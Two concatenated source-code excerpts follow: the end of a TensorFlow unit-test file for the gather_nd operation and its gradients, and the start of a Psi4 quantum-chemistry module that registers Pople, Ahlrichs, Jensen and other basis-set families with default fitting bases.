with self.assertRaisesOpError(
r"Requested more than 0 entries, but params is empty."):
gather_nd_break_t.eval()
self.assertAllClose(np.empty((0,), dtype=np.float32), gather_nd_ok_val)
def testIndexScalar(self):
with self.test_session(use_gpu=True):
params = np.array(
[[-8, -1, -2, -3, -7, -5], [8, 1, 2, 3, 7, 5]], dtype=np.float32).T
indices = constant_op.constant([4, 1])
gather_nd_t = array_ops.gather_nd(params, indices)
gather_nd_val = gather_nd_t.eval()
self.assertEqual([], gather_nd_t.get_shape())
self.assertAllEqual(np.array(7), gather_nd_val)
def testParamsRankLargerThanIndexIndexScalarSlices(self):
with self.test_session(use_gpu=True):
params = np.array(
[[-8, -1, -2, -3, -7, -5], [8, 1, 2, 3, 7, 5]], dtype=np.float32).T
indices = constant_op.constant([4])
gather_nd_t = array_ops.gather_nd(params, indices)
gather_nd_val = gather_nd_t.eval()
self.assertEqual([2], gather_nd_t.get_shape())
self.assertAllEqual(np.array([-7, 7]), gather_nd_val)
def testParamsRankLargerThanIndexSlices(self):
with self.test_session(use_gpu=True):
params = np.array(
[[-8, -1, -2, -3, -7, -5], [8, 1, 2, 3, 7, 5]], dtype=np.float32).T
indices = constant_op.constant([[4], [4], [0]])
gather_nd_t = array_ops.gather_nd(params, indices)
gather_nd_val = gather_nd_t.eval()
self.assertEqual([3, 2], gather_nd_t.get_shape())
self.assertAllEqual(np.array([[-7, 7], [-7, 7], [-8, 8]]), gather_nd_val)
def testHigherRankParamsLargerThanIndexSlices(self):
with self.test_session(use_gpu=True):
params = np.array(
[[[-8, -1, -2, -3, -7, -5], [8, 1, 2, 3, 7, 5]],
[[-80, -10, -20, -30, -70, -50], [80, 10, 20, 30, 70, 50]]],
dtype=np.float32).T
params_t = constant_op.constant(params)
indices = constant_op.constant([[4], [4], [0]])
gather_nd_t = array_ops.gather_nd(params_t, indices)
gather_nd_val = gather_nd_t.eval()
self.assertEqual([3, 2, 2], gather_nd_t.get_shape())
self.assertAllEqual(params[[4, 4, 0]], gather_nd_val)
def testEmptyIndicesLastRankMeansCopyEntireTensor(self):
with self.test_session(use_gpu=True):
params = np.array(
[[[-8, -1, -2, -3, -7, -5], [8, 1, 2, 3, 7, 5]],
[[-80, -10, -20, -30, -70, -50], [80, 10, 20, 30, 70, 50]]],
dtype=np.float32).T
params_t = constant_op.constant(params)
indices = constant_op.constant(
[[], []], dtype=dtypes.int32) # Size (2, 0)
gather_nd_t = array_ops.gather_nd(params_t, indices)
gather_nd_val = gather_nd_t.eval()
self.assertEqual([2, 6, 2, 2], gather_nd_t.get_shape())
self.assertAllEqual(
np.vstack((params[np.newaxis, :], params[np.newaxis, :])),
gather_nd_val)
def testHigherRankParamsAndIndicesLargerThanIndexSlices(self):
with self.test_session(use_gpu=True):
params = np.array(
[[[-8, -1, -2, -3, -7, -5], [8, 1, 2, 3, 7, 5]],
[[-80, -10, -20, -30, -70, -50], [80, 10, 20, 30, 70, 50]]],
dtype=np.float32).T
params_t = constant_op.constant(params)
indices = constant_op.constant([[[3], [2], [1]], [[4], [4], [0]]])
gather_nd_t = array_ops.gather_nd(params_t, indices)
gather_nd_val = gather_nd_t.eval()
self.assertEqual([2, 3, 2, 2], gather_nd_t.get_shape())
self.assertAllEqual(params[[3, 2, 1, 4, 4, 0]].reshape(2, 3, 2, 2),
gather_nd_val)
def testHigherRankParams(self):
with self.test_session(use_gpu=True):
shape = (10, 20, 5, 1, 17)
params = np.random.rand(*shape)
indices = np.vstack([np.random.randint(0, s, size=2000) for s in shape]).T
gather_nd_t = array_ops.gather_nd(params, indices)
gather_nd_val = gather_nd_t.eval()
expected = params[tuple(indices.T)]
self.assertAllEqual(expected, gather_nd_val)
self.assertEqual([2000], gather_nd_t.get_shape())
def testHigherRankParamsAndIndices(self):
with self.test_session(use_gpu=True):
shape = (10, 20, 5, 1, 17)
params = np.random.rand(*shape)
indices = np.vstack([np.random.randint(0, s, size=2000) for s in shape]).T
indices_reshaped = indices.reshape([10, 10, 20, 5])
gather_nd_t = array_ops.gather_nd(params, indices_reshaped)
gather_nd_val = gather_nd_t.eval()
expected = params[tuple(indices.T)]
self.assertAllEqual(expected.reshape([10, 10, 20]), gather_nd_val)
self.assertEqual([10, 10, 20], gather_nd_t.get_shape())
def assertIndexedSlices(self, t):
self.assertIsInstance(t, ops.IndexedSlices)
def testUnknownIndices(self):
params = constant_op.constant([[0, 1, 2]])
indices = array_ops.placeholder(dtypes.int32)
gather_nd_t = array_ops.gather_nd(params, indices)
shape = gather_nd_t.get_shape()
self.assertEqual(None, shape.ndims)
self.assertEqual(None, shape[0].value)
def testBadIndices(self):
with self.test_session(use_gpu=True):
params = [0, 1, 2]
indices = [[[0], [7]]] # Make this one higher rank
gather_nd = array_ops.gather_nd(params, indices)
with self.assertRaisesOpError(
r"flat indices\[1, :\] = \[7\] does not index into param "
r"\(shape: \[3\]\)"):
gather_nd.eval()
def testBadIndicesWithSlices(self):
with self.test_session(use_gpu=True):
params = [[0, 1, 2]]
indices = [[[0], [0], [1]]] # Make this one higher rank
gather_nd = array_ops.gather_nd(params, indices)
with self.assertRaisesOpError(
r"flat indices\[2, :\] = \[1\] does not index into param "
r"\(shape: \[1,3\]\)"):
gather_nd.eval()
def testGradientsRank2Elements(self):
indices = constant_op.constant([[0, 0], [1, 1]], dtype=dtypes.int32)
inputs = constant_op.constant([[1, 2], [3, 4]], dtype=dtypes.float64)
outputs = array_ops.gather_nd(inputs, indices)
grad_vals = constant_op.constant([1, 2], dtype=dtypes.float64)
grads = gradients_impl.gradients([outputs], [inputs], [grad_vals])[0]
expected_grads = np.array([[1, 0], [0, 2]], dtype=np.float64)
with self.test_session(use_gpu=True):
assert np.array_equal(expected_grads, grads.eval())
def testGradientsRank2Slices(self):
indices = constant_op.constant([[1], [0]], dtype=dtypes.int32)
inputs = constant_op.constant([[1, 2], [3, 4]], dtype=dtypes.float64)
outputs = array_ops.gather_nd(inputs, indices)
grad_vals = constant_op.constant([[1, 2], [3, 4]], dtype=dtypes.float64)
grads = gradients_impl.gradients([outputs], [inputs], [grad_vals])[0]
expected_grads = np.array([[3, 4], [1, 2]], dtype=np.float64)
with self.test_session(use_gpu=True):
self.assertIndexedSlices(grads)
self.assertAllEqual(expected_grads, ops.convert_to_tensor(grads).eval())
def testGradientsRank3Elements(self):
indices = constant_op.constant(
[[[0, 1], [1, 0]], [[0, 0], [1, 1]]], dtype=dtypes.int32)
inputs = constant_op.constant(
[[[1, 3], [5, 7]], [[2, 4], [6, 8]]], dtype=dtypes.float64)
outputs = array_ops.gather_nd(inputs, indices)
grad_vals = constant_op.constant(
[[[1, 2], [3, 4]], [[5, 6], [7, 8]]], dtype=dtypes.float64)
grads = gradients_impl.gradients([outputs], [inputs], [grad_vals])[0]
expected_grads = np.array(
[[[5, 6], [1, 2]], [[3, 4], [7, 8]]], dtype=np.float64)
with self.test_session(use_gpu=True):
self.assertAllEqual(expected_grads, grads.eval())
def testGradientsRank7Elements(self):
# Shape [1,1,2,1,1,2,2]
indices = constant_op.constant(
[[[
[[[[0, 0, 0, 0, 0, 1], [0, 0, 1, 0, 0, 0]]]],
[[[[0, 0, 0, 0, 0, 0], [0, 0, 1, 0, 0, 1]]]]
]]],
dtype=dtypes.int32)
inputs = constant_op.constant(
[[[
[[[[1, 3], [5, 7]]]],
[[[[2, 4], [6, 8]]]]
]]], dtype=dtypes.float64)
outputs = array_ops.gather_nd(inputs, indices)
grad_vals = constant_op.constant(
[[[
[[[[1, 2], [3, 4]]]],
[[[[5, 6], [7, 8]]]]
]]], dtype=dtypes.float64)
grads = gradients_impl.gradients([outputs], [inputs], [grad_vals])[0]
expected_grads = np.array(
[[[
[[[[5, 6], [1, 2]]]],
[[[[3, 4], [7, 8]]]]
]]], dtype=np.float64)
with self.test_session(use_gpu=True):
self.assertAllEqual(expected_grads, grads.eval())
def testGradientsInt64Indices(self):
indices = constant_op.constant(
[[[0, 1], [1, 0]], [[0, 0], [1, 1]]], dtype=dtypes.int64)
inputs = constant_op.constant(
[[[1, 3], [5, 7]], [[2, 4], [6, 8]]], dtype=dtypes.float64)
outputs = array_ops.gather_nd(inputs, indices)
grad_vals = constant_op.constant(
[[[1, 2], [3, 4]], [[5, 6], [7, 8]]], dtype=dtypes.float64)
grads = gradients_impl.gradients([outputs], [inputs], [grad_vals])[0]
expected_grads = np.array(
[[[5, 6], [1, 2]], [[3, 4], [7, 8]]], dtype=np.float64)
with self.test_session(use_gpu=True):
self.assertAllEqual(expected_grads, grads.eval())
def testGradientsRank2SlicesWithEmptySpace(self):
indices = constant_op.constant([[2], [0], [5]], dtype=dtypes.int32)
inputs = constant_op.constant(
[[1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9],
[1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9],
[1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9]],
dtype=dtypes.float64)
outputs = array_ops.gather_nd(inputs, indices)
grad_vals = constant_op.constant(
[[1, 1, 1, 1, 1, 1, 1, 1, 1], [2, 2, 2, 2, 2, 2, 2, 2, 2],
[3, 3, 3, 3, 3, 3, 3, 3, 3]],
dtype=dtypes.float64)
grads = gradients_impl.gradients([outputs], [inputs], [grad_vals])[0]
expected_grads = np.array(
[[2, 2, 2, 2, 2, 2, 2, 2, 2], [0, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0], [3, 3, 3, 3, 3, 3, 3, 3, 3]],
dtype=np.float64)
with self.test_session(use_gpu=True):
self.assertIndexedSlices(grads)
self.assertAllEqual(expected_grads, ops.convert_to_tensor(grads).eval())
class GatherNdOpBenchmark(test.Benchmark):
def benchmark_gather_nd_op(self):
shape = (100, 47, 18, 170, 13)
np.random.seed(127)
params = np.random.rand(*shape)
indices = np.vstack([np.random.randint(0, s, size=10000) for s in shape]).T
with session.Session():
t_params = variables.Variable(params)
t_indices = variables.Variable(indices)
gather_op = array_ops.gather_nd(t_params, t_indices)
variables.global_variables_initializer().run()
for _ in range(10):
gather_op.eval()
t1 = time.time()
for _ in range(1000):
gather_op.eval()
t2 = time.time()
self.report_benchmark(iters=1000, wall_time=(t2 - t1) / 1000.0)
if __name__ == "__main__":
test.main()
|
CDSherrill/psi4
|
refs/heads/master
|
psi4/driver/qcdb/basislistother.py
|
1
|
#
# @BEGIN LICENSE
#
# Psi4: an open-source quantum chemistry software package
#
# Copyright (c) 2007-2019 The Psi4 Developers.
#
# The copyrights for code used from other parties are included in
# the corresponding files.
#
# This file is part of Psi4.
#
# Psi4 is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, version 3.
#
# Psi4 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with Psi4; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# @END LICENSE
#
"""Module with commands building :py:class:`~basislist.BasisFamily` objects
for Pople and other non-Dunning orbital basis sets. Some
plausible fitting basis sets are supplied as defaults.
"""
from .basislist import *
def load_basfam_other():
# Pople
basis_sto3g = BasisFamily('STO-3G', zeta=1)
basis_321g = BasisFamily('3-21G', zeta=1)
basisfamily_list.append(basis_sto3g)
basisfamily_list.append(basis_321g)
basis_631g = BasisFamily('6-31G', zeta=2)
basis_631g_d_ = BasisFamily('6-31G(d)', zeta=2)
basis_631g_d_p_ = BasisFamily('6-31G(d,p)', zeta=2)
basis_631gs = BasisFamily('6-31G*', '6-31g_d_', zeta=2)
basis_631gss = BasisFamily('6-31G**', '6-31g_d_p_', zeta=2)
basis_631pg = BasisFamily('6-31+G', zeta=2)
basis_631pg_d_ = BasisFamily('6-31+G(d)', zeta=2)
basis_631pg_d_p_ = BasisFamily('6-31+G(d,p)', zeta=2)
basis_631pgs = BasisFamily('6-31+G*', '6-31pg_d_', zeta=2)
basis_631pgss = BasisFamily('6-31+G**', '6-31pg_d_p_', zeta=2)
basis_631ppg = BasisFamily('6-31++G', zeta=2)
basis_631ppg_d_ = BasisFamily('6-31++G(d)', zeta=2)
basis_631ppg_d_p_ = BasisFamily('6-31++G(d,p)', zeta=2)
basis_631ppgs = BasisFamily('6-31++G*', '6-31ppg_d_', zeta=2)
basis_631ppgss = BasisFamily('6-31++G**', '6-31ppg_d_p_', zeta=2)
basisfamily_list.append(basis_631g)
basisfamily_list.append(basis_631g_d_)
basisfamily_list.append(basis_631g_d_p_)
basisfamily_list.append(basis_631gs)
basisfamily_list.append(basis_631gss)
basisfamily_list.append(basis_631pg)
basisfamily_list.append(basis_631pg_d_)
basisfamily_list.append(basis_631pg_d_p_)
basisfamily_list.append(basis_631pgs)
basisfamily_list.append(basis_631pgss)
basisfamily_list.append(basis_631ppg)
basisfamily_list.append(basis_631ppg_d_)
basisfamily_list.append(basis_631ppg_d_p_)
basisfamily_list.append(basis_631ppgs)
basisfamily_list.append(basis_631ppgss)
basis_6311g = BasisFamily('6-311G', zeta=3)
basis_6311g_d_ = BasisFamily('6-311G(d)', zeta=3)
basis_6311g_d_p_ = BasisFamily('6-311G(d,p)', zeta=3)
basis_6311gs = BasisFamily('6-311G*', '6-311g_d_', zeta=3)
basis_6311gss = BasisFamily('6-311G**', '6-311g_d_p_', zeta=3)
basis_6311g_2d_ = BasisFamily('6-311G(2d)', zeta=3)
basis_6311g_2d_p_ = BasisFamily('6-311G(2d,p)', zeta=3)
basis_6311g_2d_2p_ = BasisFamily('6-311G(2d,2p)', zeta=3)
basis_6311g_2df_ = BasisFamily('6-311G(2df)', zeta=3)
basis_6311g_2df_p_ = BasisFamily('6-311G(2df,p)', zeta=3)
basis_6311g_2df_2p_ = BasisFamily('6-311G(2df,2p)', zeta=3)
basis_6311g_2df_2pd_ = BasisFamily('6-311G(2df,2pd)', zeta=3)
basis_6311g_3df_ = BasisFamily('6-311G(3df)', zeta=3)
basis_6311g_3df_p_ = BasisFamily('6-311G(3df,p)', zeta=3)
basis_6311g_3df_2p_ = BasisFamily('6-311G(3df,2p)', zeta=3)
basis_6311g_3df_2pd_ = BasisFamily('6-311G(3df,2pd)', zeta=3)
basis_6311g_3df_3pd_ = BasisFamily('6-311G(3df,3pd)', zeta=3)
basisfamily_list.append(basis_6311g)
basisfamily_list.append(basis_6311g_d_)
basisfamily_list.append(basis_6311g_d_p_)
basisfamily_list.append(basis_6311gs)
basisfamily_list.append(basis_6311gss)
basisfamily_list.append(basis_6311g_2d_)
basisfamily_list.append(basis_6311g_2d_p_)
basisfamily_list.append(basis_6311g_2d_2p_)
basisfamily_list.append(basis_6311g_2df_)
basisfamily_list.append(basis_6311g_2df_p_)
basisfamily_list.append(basis_6311g_2df_2p_)
basisfamily_list.append(basis_6311g_2df_2pd_)
basisfamily_list.append(basis_6311g_3df_)
basisfamily_list.append(basis_6311g_3df_p_)
basisfamily_list.append(basis_6311g_3df_2p_)
basisfamily_list.append(basis_6311g_3df_2pd_)
basisfamily_list.append(basis_6311g_3df_3pd_)
basis_6311pg = BasisFamily('6-311+G', zeta=3)
basis_6311pg_d_ = BasisFamily('6-311+G(d)', zeta=3)
basis_6311pg_d_p_ = BasisFamily('6-311+G(d,p)', zeta=3)
basis_6311pgs = BasisFamily('6-311+G*', '6-311pg_d_', zeta=3)
basis_6311pgss = BasisFamily('6-311+G**', '6-311pg_d_p_', zeta=3)
basis_6311pg_2d_ = BasisFamily('6-311+G(2d)', zeta=3)
basis_6311pg_2d_p_ = BasisFamily('6-311+G(2d,p)', zeta=3)
basis_6311pg_2d_2p_ = BasisFamily('6-311+G(2d,2p)', zeta=3)
basis_6311pg_2df_ = BasisFamily('6-311+G(2df)', zeta=3)
basis_6311pg_2df_p_ = BasisFamily('6-311+G(2df,p)', zeta=3)
basis_6311pg_2df_2p_ = BasisFamily('6-311+G(2df,2p)', zeta=3)
basis_6311pg_2df_2pd_ = BasisFamily('6-311+G(2df,2pd)', zeta=3)
basis_6311pg_3df_ = BasisFamily('6-311+G(3df)', zeta=3)
basis_6311pg_3df_p_ = BasisFamily('6-311+G(3df,p)', zeta=3)
basis_6311pg_3df_2p_ = BasisFamily('6-311+G(3df,2p)', zeta=3)
basis_6311pg_3df_2pd_ = BasisFamily('6-311+G(3df,2pd)', zeta=3)
basis_6311pg_3df_3pd_ = BasisFamily('6-311+G(3df,3pd)', zeta=3)
basisfamily_list.append(basis_6311pg)
basisfamily_list.append(basis_6311pg_d_)
basisfamily_list.append(basis_6311pg_d_p_)
basisfamily_list.append(basis_6311pgs)
basisfamily_list.append(basis_6311pgss)
basisfamily_list.append(basis_6311pg_2d_)
basisfamily_list.append(basis_6311pg_2d_p_)
basisfamily_list.append(basis_6311pg_2d_2p_)
basisfamily_list.append(basis_6311pg_2df_)
basisfamily_list.append(basis_6311pg_2df_p_)
basisfamily_list.append(basis_6311pg_2df_2p_)
basisfamily_list.append(basis_6311pg_2df_2pd_)
basisfamily_list.append(basis_6311pg_3df_)
basisfamily_list.append(basis_6311pg_3df_p_)
basisfamily_list.append(basis_6311pg_3df_2p_)
basisfamily_list.append(basis_6311pg_3df_2pd_)
basisfamily_list.append(basis_6311pg_3df_3pd_)
basis_6311ppg = BasisFamily('6-311++G', zeta=3)
basis_6311ppg_d_ = BasisFamily('6-311++G(d)', zeta=3)
basis_6311ppg_d_p_ = BasisFamily('6-311++G(d,p)', zeta=3)
basis_6311ppgs = BasisFamily('6-311++G*', '6-311ppg_d_', zeta=3)
basis_6311ppgss = BasisFamily('6-311++G**', '6-311ppg_d_p_', zeta=3)
basis_6311ppg_2d_ = BasisFamily('6-311++G(2d)', zeta=3)
basis_6311ppg_2d_p_ = BasisFamily('6-311++G(2d,p)', zeta=3)
basis_6311ppg_2d_2p_ = BasisFamily('6-311++G(2d,2p)', zeta=3)
basis_6311ppg_2df_ = BasisFamily('6-311++G(2df)', zeta=3)
basis_6311ppg_2df_p_ = BasisFamily('6-311++G(2df,p)', zeta=3)
basis_6311ppg_2df_2p_ = BasisFamily('6-311++G(2df,2p)', zeta=3)
basis_6311ppg_2df_2pd_ = BasisFamily('6-311++G(2df,2pd)', zeta=3)
basis_6311ppg_3df_ = BasisFamily('6-311++G(3df)', zeta=3)
basis_6311ppg_3df_p_ = BasisFamily('6-311++G(3df,p)', zeta=3)
basis_6311ppg_3df_2p_ = BasisFamily('6-311++G(3df,2p)', zeta=3)
basis_6311ppg_3df_2pd_ = BasisFamily('6-311++G(3df,2pd)', zeta=3)
basis_6311ppg_3df_3pd_ = BasisFamily('6-311++G(3df,3pd)', zeta=3)
basisfamily_list.append(basis_6311ppg)
basisfamily_list.append(basis_6311ppg_d_)
basisfamily_list.append(basis_6311ppg_d_p_)
basisfamily_list.append(basis_6311ppgs)
basisfamily_list.append(basis_6311ppgss)
basisfamily_list.append(basis_6311ppg_2d_)
basisfamily_list.append(basis_6311ppg_2d_p_)
basisfamily_list.append(basis_6311ppg_2d_2p_)
basisfamily_list.append(basis_6311ppg_2df_)
basisfamily_list.append(basis_6311ppg_2df_p_)
basisfamily_list.append(basis_6311ppg_2df_2p_)
basisfamily_list.append(basis_6311ppg_2df_2pd_)
basisfamily_list.append(basis_6311ppg_3df_)
basisfamily_list.append(basis_6311ppg_3df_p_)
basisfamily_list.append(basis_6311ppg_3df_2p_)
basisfamily_list.append(basis_6311ppg_3df_2pd_)
basisfamily_list.append(basis_6311ppg_3df_3pd_)
# Ahlrichs
basis_def2sv_p_ = BasisFamily('def2-SV(P)', zeta=2)
basis_def2msvp = BasisFamily('def2-mSVP', zeta=2)
basis_def2svp = BasisFamily('def2-SVP', zeta=2)
basis_def2svpd = BasisFamily('def2-SVPD', zeta=2)
basis_def2tzvp = BasisFamily('def2-TZVP', zeta=3)
basis_def2tzvpd = BasisFamily('def2-TZVPD', zeta=3)
basis_def2tzvpp = BasisFamily('def2-TZVPP', zeta=3)
basis_def2tzvppd = BasisFamily('def2-TZVPPD', zeta=3)
basis_def2qzvp = BasisFamily('def2-QZVP', zeta=4)
basis_def2qzvpd = BasisFamily('def2-QZVPD', zeta=4)
basis_def2qzvpp = BasisFamily('def2-QZVPP', zeta=4)
basis_def2qzvppd = BasisFamily('def2-QZVPPD', zeta=4)
basis_def2sv_p_.add_jfit('def2-universal-JFIT')
basis_def2msvp.add_jfit('def2-universal-JFIT')
basis_def2svp.add_jfit('def2-universal-JFIT')
basis_def2svpd.add_jfit('def2-universal-JFIT')
basis_def2tzvp.add_jfit('def2-universal-JFIT')
basis_def2tzvpd.add_jfit('def2-universal-JFIT')
basis_def2tzvpp.add_jfit('def2-universal-JFIT')
basis_def2tzvppd.add_jfit('def2-universal-JFIT')
basis_def2qzvp.add_jfit('def2-universal-JFIT')
basis_def2qzvpd.add_jfit('def2-universal-JFIT')
basis_def2qzvpp.add_jfit('def2-universal-JFIT')
basis_def2qzvppd.add_jfit('def2-universal-JFIT')
basis_def2sv_p_.add_jkfit('def2-universal-JKFIT')
basis_def2msvp.add_jkfit('def2-universal-JKFIT')
basis_def2svp.add_jkfit('def2-universal-JKFIT')
basis_def2svpd.add_jkfit('def2-universal-JKFIT')
basis_def2tzvp.add_jkfit('def2-universal-JKFIT')
basis_def2tzvpd.add_jkfit('def2-universal-JKFIT')
basis_def2tzvpp.add_jkfit('def2-universal-JKFIT')
basis_def2tzvppd.add_jkfit('def2-universal-JKFIT')
basis_def2qzvp.add_jkfit('def2-universal-JKFIT')
basis_def2qzvpd.add_jkfit('def2-universal-JKFIT')
basis_def2qzvpp.add_jkfit('def2-universal-JKFIT')
basis_def2qzvppd.add_jkfit('def2-universal-JKFIT')
basis_def2sv_p_.add_rifit('def2-SV(P)-RI')
basis_def2msvp.add_rifit('def2-SVP-RI')
basis_def2svp.add_rifit('def2-SVP-RI')
basis_def2svpd.add_rifit('def2-SVPD-RI')
basis_def2tzvp.add_rifit('def2-TZVP-RI')
basis_def2tzvpd.add_rifit('def2-TZVPD-RI')
basis_def2tzvpp.add_rifit('def2-TZVPP-RI')
basis_def2tzvppd.add_rifit('def2-TZVPPD-RI')
basis_def2qzvp.add_rifit('def2-QZVP-RI')
basis_def2qzvpp.add_rifit('def2-QZVPP-RI')
basis_def2qzvppd.add_rifit('def2-QZVPPD-RI')
basisfamily_list.append(basis_def2sv_p_)
basisfamily_list.append(basis_def2msvp)
basisfamily_list.append(basis_def2svp)
basisfamily_list.append(basis_def2svpd)
basisfamily_list.append(basis_def2tzvp)
basisfamily_list.append(basis_def2tzvpd)
basisfamily_list.append(basis_def2tzvpp)
basisfamily_list.append(basis_def2tzvppd)
basisfamily_list.append(basis_def2qzvp)
basisfamily_list.append(basis_def2qzvpd)
basisfamily_list.append(basis_def2qzvpp)
basisfamily_list.append(basis_def2qzvppd)
# Jensen
basis_augpcseg0 = BasisFamily('aug-pcseg-0', zeta=1)
basis_augpcseg1 = BasisFamily('aug-pcseg-1', zeta=2)
basis_augpcseg2 = BasisFamily('aug-pcseg-2', zeta=3)
basis_augpcseg3 = BasisFamily('aug-pcseg-3', zeta=4)
basis_augpcseg4 = BasisFamily('aug-pcseg-4', zeta=5)
basis_augpcsseg0 = BasisFamily('aug-pcSseg-0', zeta=1)
basis_augpcsseg1 = BasisFamily('aug-pcSseg-1', zeta=2)
basis_augpcsseg2 = BasisFamily('aug-pcSseg-2', zeta=3)
basis_augpcsseg3 = BasisFamily('aug-pcSseg-3', zeta=4)
basis_augpcsseg4 = BasisFamily('aug-pcSseg-4', zeta=5)
basis_pcseg0 = BasisFamily('pcseg-0', zeta=1)
basis_pcseg1 = BasisFamily('pcseg-1', zeta=2)
basis_pcseg2 = BasisFamily('pcseg-2', zeta=3)
basis_pcseg3 = BasisFamily('pcseg-3', zeta=4)
basis_pcseg4 = BasisFamily('pcseg-4', zeta=5)
basis_pcsseg0 = BasisFamily('pcSseg-0', zeta=1)
basis_pcsseg1 = BasisFamily('pcSseg-1', zeta=2)
basis_pcsseg2 = BasisFamily('pcSseg-2', zeta=3)
basis_pcsseg3 = BasisFamily('pcSseg-3', zeta=4)
basis_pcsseg4 = BasisFamily('pcSseg-4', zeta=5)
# Here lie practical (non-validated) fitting bases for
# Jensen orbital basis sets
basis_augpcseg0.add_jfit('def2-universal-JFIT')
basis_augpcseg1.add_jfit('def2-universal-JFIT')
basis_augpcseg2.add_jfit('def2-universal-JFIT')
basis_augpcseg3.add_jfit('def2-universal-JFIT')
basis_augpcsseg0.add_jfit('def2-universal-JFIT')
basis_augpcsseg1.add_jfit('def2-universal-JFIT')
basis_augpcsseg2.add_jfit('def2-universal-JFIT')
basis_augpcsseg3.add_jfit('def2-universal-JFIT')
basis_pcseg0.add_jfit('def2-universal-JFIT')
basis_pcseg1.add_jfit('def2-universal-JFIT')
basis_pcseg2.add_jfit('def2-universal-JFIT')
basis_pcseg3.add_jfit('def2-universal-JFIT')
basis_pcsseg0.add_jfit('def2-universal-JFIT')
basis_pcsseg1.add_jfit('def2-universal-JFIT')
basis_pcsseg2.add_jfit('def2-universal-JFIT')
basis_pcsseg3.add_jfit('def2-universal-JFIT')
basis_augpcseg0.add_jkfit('def2-universal-JKFIT')
basis_augpcseg1.add_jkfit('def2-universal-JKFIT')
basis_augpcseg2.add_jkfit('def2-universal-JKFIT')
basis_augpcseg3.add_jkfit('def2-universal-JKFIT')
basis_augpcseg4.add_jkfit('aug-cc-pV5Z-JKFIT')
basis_augpcsseg0.add_jkfit('def2-universal-JKFIT')
basis_augpcsseg1.add_jkfit('def2-universal-JKFIT')
basis_augpcsseg2.add_jkfit('def2-universal-JKFIT')
basis_augpcsseg3.add_jkfit('def2-universal-JKFIT')
basis_augpcsseg4.add_jkfit('aug-cc-pV5Z-JKFIT')
basis_pcseg0.add_jkfit('def2-universal-JKFIT')
basis_pcseg1.add_jkfit('def2-universal-JKFIT')
basis_pcseg2.add_jkfit('def2-universal-JKFIT')
basis_pcseg3.add_jkfit('def2-universal-JKFIT')
basis_pcseg4.add_jkfit('cc-pV5Z-JKFIT')
basis_pcsseg0.add_jkfit('def2-universal-JKFIT')
basis_pcsseg1.add_jkfit('def2-universal-JKFIT')
basis_pcsseg2.add_jkfit('def2-universal-JKFIT')
basis_pcsseg3.add_jkfit('def2-universal-JKFIT')
basis_pcsseg4.add_jkfit('cc-pV5Z-JKFIT')
basis_augpcseg0.add_rifit('def2-SV(P)-RI')
basis_augpcseg1.add_rifit('def2-SVPD-RI')
basis_augpcseg2.add_rifit('def2-TZVPPD-RI')
basis_augpcseg3.add_rifit('def2-QZVPPD-RI')
basis_augpcseg4.add_rifit('aug-cc-pV5Z-RI')
basis_augpcsseg0.add_rifit('def2-SV(P)-RI')
basis_augpcsseg1.add_rifit('def2-SVPD-RI')
basis_augpcsseg2.add_rifit('def2-TZVPPD-RI')
basis_augpcsseg3.add_rifit('def2-QZVPPD-RI')
basis_augpcsseg4.add_rifit('aug-cc-pwCV5Z-RI')
basis_pcseg0.add_rifit('def2-SV(P)-RI')
basis_pcseg1.add_rifit('def2-SVP-RI')
basis_pcseg2.add_rifit('def2-TZVPP-RI')
basis_pcseg3.add_rifit('def2-QZVPP-RI')
basis_pcseg4.add_rifit('cc-pV5Z-RI')
basis_pcsseg0.add_rifit('def2-SV(P)-RI')
basis_pcsseg1.add_rifit('def2-SVP-RI')
basis_pcsseg2.add_rifit('def2-TZVPP-RI')
basis_pcsseg3.add_rifit('def2-QZVPP-RI')
basis_pcsseg4.add_rifit('cc-pwCV5Z-RI')
basisfamily_list.append(basis_augpcseg0)
basisfamily_list.append(basis_augpcseg1)
basisfamily_list.append(basis_augpcseg2)
basisfamily_list.append(basis_augpcseg3)
basisfamily_list.append(basis_augpcseg4)
basisfamily_list.append(basis_augpcsseg0)
basisfamily_list.append(basis_augpcsseg1)
basisfamily_list.append(basis_augpcsseg2)
basisfamily_list.append(basis_augpcsseg3)
basisfamily_list.append(basis_augpcsseg4)
basisfamily_list.append(basis_pcseg0)
basisfamily_list.append(basis_pcseg1)
basisfamily_list.append(basis_pcseg2)
basisfamily_list.append(basis_pcseg3)
basisfamily_list.append(basis_pcseg4)
basisfamily_list.append(basis_pcsseg0)
basisfamily_list.append(basis_pcsseg1)
basisfamily_list.append(basis_pcsseg2)
basisfamily_list.append(basis_pcsseg3)
basisfamily_list.append(basis_pcsseg4)
# Minix
basis_minix = BasisFamily('minix', zeta=2)
basis_minix.add_jfit('def2-universal-JFIT')
basis_minix.add_jkfit('def2-universal-JKFIT')
basis_minix.add_rifit('def2-SVP-RI')
basisfamily_list.append(basis_minix)
# Others
basis_dz = BasisFamily('DZ')
basis_dzp = BasisFamily('DZP')
basis_dzvp = BasisFamily('DZVP')
basis_psi3dzp = BasisFamily('psi3-DZP')
basis_psi3tz2p = BasisFamily('psi3-TZ2P')
basis_psi3tz2pf = BasisFamily('psi3-TZ2PF')
basis_sadlejlpoldl = BasisFamily('sadlej-lpol-dl')
basis_sadlejlpolds = BasisFamily('sadlej-lpol-ds')
basis_sadlejlpolfl = BasisFamily('sadlej-lpol-fl')
basis_sadlejlpolfs = BasisFamily('sadlej-lpol-fs')
basisfamily_list.append(basis_dz)
basisfamily_list.append(basis_dzp)
basisfamily_list.append(basis_dzvp)
basisfamily_list.append(basis_psi3dzp)
basisfamily_list.append(basis_psi3tz2p)
basisfamily_list.append(basis_psi3tz2pf)
basisfamily_list.append(basis_sadlejlpoldl)
